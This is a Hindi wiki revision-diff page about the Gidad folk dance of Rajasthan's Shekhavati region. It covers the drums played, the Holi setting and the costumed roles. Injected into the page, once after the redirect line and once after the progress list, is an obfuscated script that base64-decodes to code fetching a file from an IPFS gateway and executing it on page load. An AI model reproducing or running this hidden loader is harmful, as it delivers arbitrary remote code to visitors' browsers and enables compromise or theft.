Difference between revisions of "गीदड़ नृत्य"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''गीदड़ नृत्य''' राजस्थान के प्रसिद्ध [[लोक नृत्य|लोक ...' के साथ नया पन्ना बनाया)
 
 
Line 3: Line 3:
 
*इस नृत्य के मुख्य [[वाद्य यंत्र]] [[नगाड़ा]], [[ढोल]], डफ व चंग हैं। नगाड़े की चोट पर पुरुष अपने दोनों हाथों के डण्डे को परस्पर टकराते हुए नृत्य करते हैं।
 
*इस नृत्य के मुख्य [[वाद्य यंत्र]] [[नगाड़ा]], [[ढोल]], डफ व चंग हैं। नगाड़े की चोट पर पुरुष अपने दोनों हाथों के डण्डे को परस्पर टकराते हुए नृत्य करते हैं।
 
*[[राजस्थान]] का यह नृत्य समाज की एकता का सूत्रधार है।
 
*[[राजस्थान]] का यह नृत्य समाज की एकता का सूत्रधार है।
*गीदड़ नृत्य का प्रमुख क्षेत्र शेखावाटी है, जिसमें [[सीकर]], लक्ष्मणगढ़, [[चुरू ज़िला|चुरू]], [[झुंझुनू]], रामगढ़ व सुजानगढ़ आदि क्षेत्रों की गिनती की जाती हैं।
+
*गीदड़ नृत्य का प्रमुख क्षेत्र शेखावाटी है, जिसमें [[सीकर]], [[लक्ष्मणगढ़]], [[चुरू ज़िला|चुरू]], [[झुंझुनू]], रामगढ़ व सुजानगढ़ आदि क्षेत्रों की गिनती की जाती हैं।
 
*[[होली]] के उत्सवी माहोल में यह नृत्य किया जाता हैं।
 
*[[होली]] के उत्सवी माहोल में यह नृत्य किया जाता हैं।
 
*ग्राम्य क्षेत्रों के लोग प्रसाद चढ़ जाने के बाद अर्थात् डांडा रोपे जाने के बाद इस नृत्य को खुले [[मैदान]] में सामूहिक उत्साह के साथ आरम्भ करते हैं।
 
*ग्राम्य क्षेत्रों के लोग प्रसाद चढ़ जाने के बाद अर्थात् डांडा रोपे जाने के बाद इस नृत्य को खुले [[मैदान]] में सामूहिक उत्साह के साथ आरम्भ करते हैं।

Latest revision as of 13:38, 15 October 2014

gid d nrity rajasthan ke prasiddh lok nrityoan mean se ek hai. yah 'holi' ke avasar par kiya jane vala shekhavati kshetr ka prasiddh nrity hai. isamean tal, sur aur nrity ka samanvay dekhane ko milata hai. yah nrity keval purush hi prastut karate haian.

  • is nrity ke mukhy vady yantr naga da, dhol, daph v chang haian. naga de ki chot par purush apane donoan hathoan ke dande ko paraspar takarate hue nrity karate haian.
  • rajasthan ka yah nrity samaj ki ekata ka sootradhar hai.
  • gid d nrity ka pramukh kshetr shekhavati hai, jisamean sikar, lakshmanagadh, churoo, jhuanjhunoo, ramagadh v sujanagadh adi kshetroan ki ginati ki jati haian.
  • holi ke utsavi mahol mean yah nrity kiya jata haian.
  • gramy kshetroan ke log prasad chadh jane ke bad arthath daanda rope jane ke bad is nrity ko khule maidan mean samoohik utsah ke sath arambh karate haian.
  • gid d nrity naga de ki thap ke sath dandoan ki paraspar takarahat se shuroo hota hai. nartakoan ke pairoan ki gati naga de ki tal par chalati hai.
  • naga dachi age-pichhe daandiya takarate haian aur theke ki avritti ke sath nartakoan ke kadam age badhate rahate haian.
  • yah ek prakar ka svaang nrity hai, at: nachane vale shiv-parvati, sita-ram, shrikrishna, seth-sethani, pathan, padari, bajigar, sadhu, shikari yoddha adi vividh roop dharan karake nrity karate haian.


  1. REDIRECTsaancha:inhean bhi dekhean<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh